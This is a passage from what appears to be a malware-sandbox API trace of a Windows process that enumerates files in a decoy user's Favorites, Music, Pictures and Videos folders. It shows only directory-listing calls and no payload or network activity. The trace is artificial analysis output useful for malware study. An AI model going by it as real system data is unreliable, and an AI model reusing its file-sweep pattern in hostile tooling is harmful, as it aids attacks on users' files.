lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0175.823] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.824] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.825] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0175.825] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0175.825] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.825] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.825] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.825] PathFindFileNameW (pszPath="") returned="" [0175.825] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0175.827] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0175.827] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.828] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.828] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0175.828] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0175.828] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.828] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.828] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.829] PathFindFileNameW (pszPath="") returned="" [0175.829] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.830] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1103610, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x6eb6c8c0, ftLastAccessTime.dwHighDateTime=0x1d89cc6, ftLastWriteTime.dwLowDateTime=0x6eb6c8c0, ftLastWriteTime.dwHighDateTime=0x1d89cc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iPggquG4", cAlternateFileName="")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5116cc00, ftCreationTime.dwHighDateTime=0x1d89abb, ftLastAccessTime.dwLowDateTime=0xeb1119a0, ftLastAccessTime.dwHighDateTime=0x1d89c9b, ftLastWriteTime.dwLowDateTime=0xeb1119a0, ftLastWriteTime.dwHighDateTime=0x1d89c9b, nFileSizeHigh=0x0, nFileSizeLow=0x145db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LNo4VDj5U-Z.wav", cAlternateFileName="LNO4VD~1.WAV")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97648be0, ftCreationTime.dwHighDateTime=0x1d8a1f8, ftLastAccessTime.dwLowDateTime=0xf27823d0, ftLastAccessTime.dwHighDateTime=0x1d8a5d0, ftLastWriteTime.dwLowDateTime=0xf27823d0, ftLastWriteTime.dwHighDateTime=0x1d8a5d0, nFileSizeHigh=0x0, nFileSizeLow=0xdd20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nfk529nzfIj1e1.mp3", cAlternateFileName="NFK529~1.MP3")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12307f40, ftCreationTime.dwHighDateTime=0x1d8a529, ftLastAccessTime.dwLowDateTime=0xca13c190, ftLastAccessTime.dwHighDateTime=0x1d8a587, ftLastWriteTime.dwLowDateTime=0xca13c190, ftLastWriteTime.dwHighDateTime=0x1d8a587, nFileSizeHigh=0x0, nFileSizeLow=0xee92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uI-Z5b.m4a", cAlternateFileName="")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569341e0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xc8d57cb0, ftLastAccessTime.dwHighDateTime=0x1d8a66d, ftLastWriteTime.dwLowDateTime=0xc8d57cb0, ftLastWriteTime.dwHighDateTime=0x1d8a66d, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wd-bCBiK6pAQlyST.m4a", cAlternateFileName="WD-BCB~1.M4A")) returned 1 [0175.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569341e0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xc8d57cb0, ftLastAccessTime.dwHighDateTime=0x1d8a66d, ftLastWriteTime.dwLowDateTime=0xc8d57cb0, ftLastWriteTime.dwHighDateTime=0x1d8a66d, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wd-bCBiK6pAQlyST.m4a", cAlternateFileName="WD-BCB~1.M4A")) returned 0 [0175.831] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.832] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.832] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\") returned="pE 0cUon\\" [0175.832] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0175.832] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.832] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.832] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.832] PathFindFileNameW (pszPath="") returned="" [0175.832] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\*" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.833] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.833] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe33bc730, ftCreationTime.dwHighDateTime=0x1d8a4d3, ftLastAccessTime.dwLowDateTime=0xf164d450, ftLastAccessTime.dwHighDateTime=0x1d8a5aa, ftLastWriteTime.dwLowDateTime=0xf164d450, ftLastWriteTime.dwHighDateTime=0x1d8a5aa, nFileSizeHigh=0x0, nFileSizeLow=0x165a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I_smja7ZftD 88.wav", cAlternateFileName="I_SMJA~1.WAV")) returned 1 [0175.833] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5593a0, ftCreationTime.dwHighDateTime=0x1d89cb8, ftLastAccessTime.dwLowDateTime=0x1afeb970, ftLastAccessTime.dwHighDateTime=0x1d89eda, ftLastWriteTime.dwLowDateTime=0x1afeb970, ftLastWriteTime.dwHighDateTime=0x1d89eda, nFileSizeHigh=0x0, nFileSizeLow=0x9b09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jrz5Y.mp3", cAlternateFileName="")) returned 1 [0175.834] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xogO", cAlternateFileName="")) returned 1 [0175.834] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xogO", cAlternateFileName="")) returned 0 [0175.834] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.834] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.834] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0175.834] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0175.834] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.834] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.834] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.834] PathFindFileNameW (pszPath="") returned="" [0175.834] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc02b380, ftCreationTime.dwHighDateTime=0x1d8a1ce, ftLastAccessTime.dwLowDateTime=0x6d1210b0, ftLastAccessTime.dwHighDateTime=0x1d8a64e, ftLastWriteTime.dwLowDateTime=0x6d1210b0, ftLastWriteTime.dwHighDateTime=0x1d8a64e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Q5_45ijmfP9bA", cAlternateFileName="7Q5_45~1")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43afb100, ftCreationTime.dwHighDateTime=0x1d8a284, ftLastAccessTime.dwLowDateTime=0x3af16be0, ftLastAccessTime.dwHighDateTime=0x1d8a5df, ftLastWriteTime.dwLowDateTime=0x3af16be0, ftLastWriteTime.dwHighDateTime=0x1d8a5df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d7pQIdSiE6laiAyeoE", cAlternateFileName="D7PQID~1")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe730ce80, ftCreationTime.dwHighDateTime=0x1d898f3, ftLastAccessTime.dwLowDateTime=0x4ed80dc0, ftLastAccessTime.dwHighDateTime=0x1d89cb7, ftLastWriteTime.dwLowDateTime=0x4ed80dc0, ftLastWriteTime.dwHighDateTime=0x1d89cb7, nFileSizeHigh=0x0, nFileSizeLow=0xe120, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E07daaq0LDB.bmp", cAlternateFileName="E07DAA~1.BMP")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68188070, ftCreationTime.dwHighDateTime=0x1d898ad, ftLastAccessTime.dwLowDateTime=0x78909240, ftLastAccessTime.dwHighDateTime=0x1d8a009, ftLastWriteTime.dwLowDateTime=0x78909240, ftLastWriteTime.dwHighDateTime=0x1d8a009, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E5UCc4GR1Z tMgYPe", cAlternateFileName="E5UCC4~1")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe67fc20, ftCreationTime.dwHighDateTime=0x1d89c42, ftLastAccessTime.dwLowDateTime=0xa66a5cf0, ftLastAccessTime.dwHighDateTime=0x1d89d07, ftLastWriteTime.dwLowDateTime=0xa66a5cf0, ftLastWriteTime.dwHighDateTime=0x1d89d07, nFileSizeHigh=0x0, nFileSizeLow=0x13901, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gFRsS2-OR13.gif", cAlternateFileName="GFRSS2~1.GIF")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfe2cd40, ftCreationTime.dwHighDateTime=0x1d8a43a, ftLastAccessTime.dwLowDateTime=0x8bbdeef0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x8bbdeef0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P5pCqlWF", cAlternateFileName="")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bed1410, ftCreationTime.dwHighDateTime=0x1d89f7c, ftLastAccessTime.dwLowDateTime=0xdd778140, ftLastAccessTime.dwHighDateTime=0x1d8a546, ftLastWriteTime.dwLowDateTime=0xdd778140, ftLastWriteTime.dwHighDateTime=0x1d8a546, nFileSizeHigh=0x0, nFileSizeLow=0x17b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rR87s4ZrE.gif", cAlternateFileName="RR87S4~1.GIF")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a5430, ftCreationTime.dwHighDateTime=0x1d89d63, ftLastAccessTime.dwLowDateTime=0xc364c3a0, ftLastAccessTime.dwHighDateTime=0x1d8a4e0, ftLastWriteTime.dwLowDateTime=0xc364c3a0, ftLastWriteTime.dwHighDateTime=0x1d8a4e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tE1LWlZl-CqVZeW gL", cAlternateFileName="TE1LWL~1")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd0d49010, ftCreationTime.dwHighDateTime=0x1d8a38c, ftLastAccessTime.dwLowDateTime=0xfec9f830, ftLastAccessTime.dwHighDateTime=0x1d8a660, ftLastWriteTime.dwLowDateTime=0xfec9f830, ftLastWriteTime.dwHighDateTime=0x1d8a660, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ths6OlVH", cAlternateFileName="")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27530710, ftCreationTime.dwHighDateTime=0x1d89c02, ftLastAccessTime.dwLowDateTime=0x89a47410, ftLastAccessTime.dwHighDateTime=0x1d8a271, ftLastWriteTime.dwLowDateTime=0x89a47410, ftLastWriteTime.dwHighDateTime=0x1d8a271, nFileSizeHigh=0x0, nFileSizeLow=0xdb83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WajpnYwwAMaGET.bmp", cAlternateFileName="WAJPNY~1.BMP")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e24170, ftCreationTime.dwHighDateTime=0x1d8a60f, ftLastAccessTime.dwLowDateTime=0xce4c2280, ftLastAccessTime.dwHighDateTime=0x1d8a6e4, ftLastWriteTime.dwLowDateTime=0xce4c2280, ftLastWriteTime.dwHighDateTime=0x1d8a6e4, nFileSizeHigh=0x0, nFileSizeLow=0x5acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XI5TTs XOUtx12juL.png", cAlternateFileName="XI5TTS~1.PNG")) returned 1 [0175.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e24170, ftCreationTime.dwHighDateTime=0x1d8a60f, ftLastAccessTime.dwLowDateTime=0xce4c2280, ftLastAccessTime.dwHighDateTime=0x1d8a6e4, ftLastWriteTime.dwLowDateTime=0xce4c2280, ftLastWriteTime.dwHighDateTime=0x1d8a6e4, nFileSizeHigh=0x0, nFileSizeLow=0x5acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XI5TTs XOUtx12juL.png", cAlternateFileName="XI5TTS~1.PNG")) returned 0 [0175.837] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.838] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.838] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0175.839] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0175.839] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.839] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.839] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.839] PathFindFileNameW (pszPath="") returned="" [0175.839] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\*" (normalized: 